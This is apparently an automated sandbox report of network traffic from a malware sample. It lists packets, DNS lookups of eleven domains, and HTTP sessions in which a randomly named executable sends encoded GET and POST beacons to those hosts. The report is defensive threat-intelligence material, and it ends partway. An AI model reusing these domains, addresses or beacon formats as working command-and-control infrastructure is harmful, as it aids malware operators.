Nov 7, 2024 08:11:29.416802883 CET	80	50036	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:29.417598009 CET	50036	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:29.429464102 CET	50036	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:29.437887907 CET	80	50036	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:30.103487015 CET	80	50036	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:30.158384085 CET	50036	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:30.386950970 CET	80	50036	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:30.386970043 CET	80	50036	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:30.387021065 CET	50036	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:30.387054920 CET	50036	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:30.941457033 CET	50036	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:31.972629070 CET	50037	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:31.977638006 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:31.977708101 CET	50037	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:32.024621010 CET	50037	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:32.029684067 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.029711962 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.029759884 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.029769897 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.029795885 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.029804945 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.029843092 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.029851913 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.029870987 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.660830975 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.698632956 CET	80	50037	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:32.701545000 CET	50037	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:33.535605907 CET	50037	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:34.593826056 CET	50038	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:34.599701881 CET	80	50038	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:34.601528883 CET	50038	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:34.617461920 CET	50038	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:34.622406960 CET	80	50038	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:35.283035994 CET	80	50038	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:35.321687937 CET	80	50038	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:35.325609922 CET	50038	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:35.329462051 CET	50038	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:35.334228992 CET	80	50038	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:40.751663923 CET	50039	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:40.756473064 CET	80	50039	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:40.757611036 CET	50039	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:40.769463062 CET	50039	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:40.774372101 CET	80	50039	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:41.721214056 CET	80	50039	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:41.767787933 CET	50039	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:41.900511026 CET	80	50039	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:41.900595903 CET	50039	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:42.283473969 CET	50039	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:43.301548958 CET	50040	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:43.306823969 CET	80	50040	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:43.306920052 CET	50040	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:43.317460060 CET	50040	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:43.322288990 CET	80	50040	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:44.249499083 CET	80	50040	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:44.337131977 CET	50040	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:44.429070950 CET	80	50040	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:44.429133892 CET	50040	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:44.833487988 CET	50040	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:46.192730904 CET	50041	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:46.199502945 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:46.199601889 CET	50041	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:46.210450888 CET	50041	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:46.217511892 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:46.217525005 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:46.217534065 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:46.217542887 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:46.217550993 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:46.217559099 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:46.217562914 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:46.217566013 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:46.217573881 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:47.155010939 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:47.205503941 CET	50041	80	192.168.2.4	107.163.130.253
Nov 7, 2024 08:11:47.334389925 CET	80	50041	107.163.130.253	192.168.2.4
Nov 7, 2024 08:11:47.335045099 CET	50041	80	192.168.2.4	107.163.130.253

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 08:09:21.143407106 CET	49937	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:09:21.248920918 CET	53	49937	1.1.1.1	192.168.2.4
Nov 7, 2024 08:09:37.367588997 CET	64022	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:09:37.449527025 CET	53	64022	1.1.1.1	192.168.2.4
Nov 7, 2024 08:09:50.724610090 CET	60645	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:09:50.902791977 CET	53	60645	1.1.1.1	192.168.2.4
Nov 7, 2024 08:10:04.334147930 CET	62285	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:10:04.345813990 CET	53	62285	1.1.1.1	192.168.2.4
Nov 7, 2024 08:10:18.131756067 CET	50948	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:10:18.195549965 CET	53	50948	1.1.1.1	192.168.2.4
Nov 7, 2024 08:10:31.833807945 CET	51265	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:10:31.870176077 CET	53	51265	1.1.1.1	192.168.2.4
Nov 7, 2024 08:10:45.331665039 CET	50381	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:10:45.482583046 CET	53	50381	1.1.1.1	192.168.2.4
Nov 7, 2024 08:10:58.850817919 CET	61818	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:10:59.427309990 CET	53	61818	1.1.1.1	192.168.2.4
Nov 7, 2024 08:11:13.117461920 CET	55720	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:11:13.197706938 CET	53	55720	1.1.1.1	192.168.2.4
Nov 7, 2024 08:11:26.837460041 CET	61064	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:11:26.855391979 CET	53	61064	1.1.1.1	192.168.2.4
Nov 7, 2024 08:11:40.337428093 CET	52925	53	192.168.2.4	1.1.1.1
Nov 7, 2024 08:11:40.746428013 CET	53	52925	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 7, 2024 08:09:21.143407106 CET	192.168.2.4	1.1.1.1	0x5b2c	Standard query (0)	www.dpo-medicina.online	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:09:37.367588997 CET	192.168.2.4	1.1.1.1	0xd223	Standard query (0)	www.gold-rates.online	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:09:50.724610090 CET	192.168.2.4	1.1.1.1	0x1b46	Standard query (0)	www.loginov.enterprises	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:04.334147930 CET	192.168.2.4	1.1.1.1	0xd956	Standard query (0)	www.2925588.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:18.131756067 CET	192.168.2.4	1.1.1.1	0x77	Standard query (0)	www.treatyourownhip.online	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:31.833807945 CET	192.168.2.4	1.1.1.1	0xe0ae	Standard query (0)	www.premium303max.rest	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:45.331665039 CET	192.168.2.4	1.1.1.1	0xcd64	Standard query (0)	www.adsdomain-195.click	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:58.850817919 CET	192.168.2.4	1.1.1.1	0x8198	Standard query (0)	www.broork.sbs	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:11:13.117461920 CET	192.168.2.4	1.1.1.1	0xdbf0	Standard query (0)	www.nutrigenfit.online	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:11:26.837460041 CET	192.168.2.4	1.1.1.1	0xcfd6	Standard query (0)	www.plyvik.info	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:11:40.337428093 CET	192.168.2.4	1.1.1.1	0x4c82	Standard query (0)	www.68529.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 7, 2024 08:09:21.248920918 CET	1.1.1.1	192.168.2.4	0x5b2c	No error (0)	www.dpo-medicina.online		194.58.112.174	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:09:37.449527025 CET	1.1.1.1	192.168.2.4	0xd223	No error (0)	www.gold-rates.online		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:09:50.902791977 CET	1.1.1.1	192.168.2.4	0x1b46	No error (0)	www.loginov.enterprises	loginov.enterprises		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 08:09:50.902791977 CET	1.1.1.1	192.168.2.4	0x1b46	No error (0)	loginov.enterprises		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:09:50.902791977 CET	1.1.1.1	192.168.2.4	0x1b46	No error (0)	loginov.enterprises		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:04.345813990 CET	1.1.1.1	192.168.2.4	0xd956	No error (0)	www.2925588.com		103.71.154.12	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:18.195549965 CET	1.1.1.1	192.168.2.4	0x77	No error (0)	www.treatyourownhip.online	treatyourownhip.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 08:10:18.195549965 CET	1.1.1.1	192.168.2.4	0x77	No error (0)	treatyourownhip.online		81.169.145.95	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:31.870176077 CET	1.1.1.1	192.168.2.4	0xe0ae	No error (0)	www.premium303max.rest		45.79.252.94	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:45.482583046 CET	1.1.1.1	192.168.2.4	0xcd64	No error (0)	www.adsdomain-195.click		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:10:59.427309990 CET	1.1.1.1	192.168.2.4	0x8198	No error (0)	www.broork.sbs		163.44.176.12	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:11:13.197706938 CET	1.1.1.1	192.168.2.4	0xdbf0	No error (0)	www.nutrigenfit.online	nutrigenfit.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 08:11:13.197706938 CET	1.1.1.1	192.168.2.4	0xdbf0	No error (0)	nutrigenfit.online		195.110.124.133	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:11:26.855391979 CET	1.1.1.1	192.168.2.4	0xcfd6	No error (0)	www.plyvik.info		67.223.117.142	A (IP address)	IN (0x0001)	false
Nov 7, 2024 08:11:40.746428013 CET	1.1.1.1	192.168.2.4	0x4c82	No error (0)	www.68529.xyz		107.163.130.253	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dpo-medicina.online

www.gold-rates.online

www.loginov.enterprises

www.2925588.com

www.treatyourownhip.online

www.premium303max.rest

www.adsdomain-195.click

www.broork.sbs

www.nutrigenfit.online

www.plyvik.info

www.68529.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	194.58.112.174	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:09:21.268678904 CET	414	OUT	GET /hzvv/?NbcPAHe=rORncVVdvgzWlpxpb9yAxBmqwfum8HsoM18MThSKdmZP0ohcmrwEBuX8zFjiIhpadHd1pz5OrNzpltMAb4bxQm02AY0asKkAwo7Ftw/RpgJscp/dfcLJk0A=&9Pj=rz_D HTTP/1.1 Host: www.dpo-medicina.online Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 7, 2024 08:09:22.154660940 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Nov 2024 07:09:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 35 31 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 64 70 6f 2d 6d 65 64 69 63 69 6e 61 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED] Data Ascii: 2517<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.dpo-medicina.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://r [TRUNCATED]
Nov 7, 2024 08:09:22.154808044 CET	1236	IN	Data Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.dpo-medicina.online</h1><p class="b-parki
Nov 7, 2024 08:09:22.154966116 CET	424	IN	Data Raw: 69 74 6c 65 22 3e d0 94 d1 80 d1 83 d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 Data Ascii: itle"> .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__pro
Nov 7, 2024 08:09:22.155575991 CET	1236	IN	Data Raw: 2d 6d 61 72 67 69 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 6e 65 22 3e d0 9d d0 b0 d0 b4 d1 91 d0 b6 d0 bd d1 8b d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c Data Ascii: -margin_bottom-none">  </p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-tex
Nov 7, 2024 08:09:22.155586004 CET	212	IN	Data Raw: 70 61 72 6b 69 6e 67 5f 5f 70 72 69 63 65 22 3e d0 be d1 82 20 3c 62 20 63 6c 61 73 73 3d 22 62 2d 70 72 69 63 65 5f 5f 61 6d 6f 75 6e 74 22 3e 38 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e Data Ascii: parking__price"> <b class="b-price__amount">83 <span class="char-rouble-native">₽</span> </b><span class="l-margin_left-small"> </span></p></div></div><div class="b-parking__promo-
Nov 7, 2024 08:09:22.156255007 CET	1236	IN	Data Raw: 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 Data Ascii: item b-parking__promo-item_type_hosting"><strong class="b-title b-title_size_large-compact"> , VPS  Dedicated</strong><p class="b-text b-parking__promo-description">
Nov 7, 2024 08:09:22.156265020 CET	212	IN	Data Raw: 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 73 73 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d Data Ascii: </div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-title b-title_size_large-compa
Nov 7, 2024 08:09:22.156275988 CET	1236	IN	Data Raw: 63 74 20 62 2d 74 69 74 6c 65 5f 6d 61 72 67 69 6e 5f 6e 6f 6e 65 22 3e 53 53 4c 2d d1 81 d0 b5 d1 80 d1 82 d0 b8 d1 84 d0 b8 d0 ba d0 b0 d1 82 20 d0 b1 d0 b5 d1 81 d0 bf d0 bb d0 b0 d1 82 d0 bd d0 be 20 d0 bd d0 b0 26 6e 62 73 70 3b 36 20 d0 bc Data Ascii: ct b-title_margin_none">SSL-  6 </strong><a class="b-button b-button_color_reference b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type
Nov 7, 2024 08:09:22.156424999 CET	1236	IN	Data Raw: 20 20 20 69 66 20 28 20 64 61 74 61 2e 65 72 72 6f 72 5f 63 6f 64 65 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 Data Ascii: if ( data.error_code ) { return; } if ( data.ref_id ) { var links = document.querySelectorAll( 'a' ); for ( var i = 0; i < links.length; i++) { if
Nov 7, 2024 08:09:22.156435966 CET	1236	IN	Data Raw: 5b 5e 5c 73 5d 2b 2f 20 29 5b 30 5d 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 20 64 6f 6d 61 69 6e 4e 61 6d 65 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 4e 61 6d 65 55 6e 69 63 6f 64 65 20 3d 20 70 75 6e Data Ascii: [^\s]+/ )[0]; if ( domainName ) { var domainNameUnicode = punycode.ToUnicode( domainName ); document.title = document.title.replace( domainName, domainNameUnicode ); } for ( var i = 0; i < spa
Nov 7, 2024 08:09:22.159946918 CET	158	IN	Data Raw: 63 3d 22 68 74 74 70 73 3a 2f 2f 6d 63 2e 79 61 6e 64 65 78 2e 72 75 2f 77 61 74 63 68 2f 39 38 34 36 36 33 32 39 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 22 20 61 Data Ascii: c="https://mc.yandex.ru/watch/98466329" style="position:absolute; left:-9999px;" alt=""></div></noscript>... /Yandex.Metrika counter --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49749	199.59.243.227	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:09:37.468889952 CET	693	OUT	POST /026w/ HTTP/1.1 Host: www.gold-rates.online Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.gold-rates.online Referer: http://www.gold-rates.online/026w/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 31 72 39 4c 47 67 42 54 66 37 43 47 55 6c 7a 55 47 37 6a 6a 37 73 79 4b 6d 32 46 4f 68 4e 75 7a 6e 54 50 44 62 36 52 38 62 6f 32 48 47 63 75 4e 72 32 58 51 69 33 2b 4a 68 54 6f 41 41 6d 4a 6d 6e 64 64 58 41 38 63 65 62 6f 65 61 41 50 6f 46 34 55 66 43 63 79 36 30 6e 35 6e 31 77 78 42 56 54 4f 51 57 6f 6e 38 4f 6f 43 67 52 78 6a 6c 56 41 70 53 4b 50 55 6f 66 6a 62 75 4a 37 54 43 55 75 68 54 4b 57 55 7a 4f 52 6c 57 74 6b 59 5a 42 57 57 36 43 77 76 4c 72 59 6b 65 46 65 59 64 42 36 66 47 6b 75 39 6e 58 4d 48 32 69 35 30 63 4b 66 36 77 6e 31 41 3d 3d Data Ascii: NbcPAHe=oaImfau1/9zZ1r9LGgBTf7CGUlzUG7jj7syKm2FOhNuznTPDb6R8bo2HGcuNr2XQi3+JhToAAmJmnddXA8ceboeaAPoF4UfCcy60n5n1wxBVTOQWon8OoCgRxjlVApSKPUofjbuJ7TCUuhTKWUzORlWtkYZBWW6CwvLrYkeFeYdB6fGku9nXMH2i50cKf6wn1A==
Nov 7, 2024 08:09:38.091495991 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 07 Nov 2024 07:09:37 GMT content-type: text/html; charset=utf-8 content-length: 1138 x-request-id: 5b0c4e12-2b2e-48df-b2ed-ef03ed4cb6a4 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw== set-cookie: parking_session=5b0c4e12-2b2e-48df-b2ed-ef03ed4cb6a4; expires=Thu, 07 Nov 2024 07:24:38 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 77 68 36 7a 47 61 69 52 5a 2b 77 70 73 62 71 57 74 4c 58 68 4c 66 4f 4d 7a 77 54 47 31 61 73 2f 36 32 75 4d 6d 61 43 77 45 46 71 30 68 32 76 43 41 72 4e 5a 54 4a 69 4a 61 54 48 67 48 67 79 4e 76 6a 45 55 65 54 47 49 55 56 67 4d 64 78 64 39 79 47 64 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zwh6zGaiRZ+wpsbqWtLXhLfOMzwTG1as/62uMmaCwEFq0h2vCArNZTJiJaTHgHgyNvjEUeTGIUVgMdxd9yGdtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 7, 2024 08:09:38.091515064 CET	591	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWIwYzRlMTItMmIyZS00OGRmLWIyZWQtZWYwM2VkNGNiNmE0IiwicGFnZV90aW1lIjoxNzMwOTYzMz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
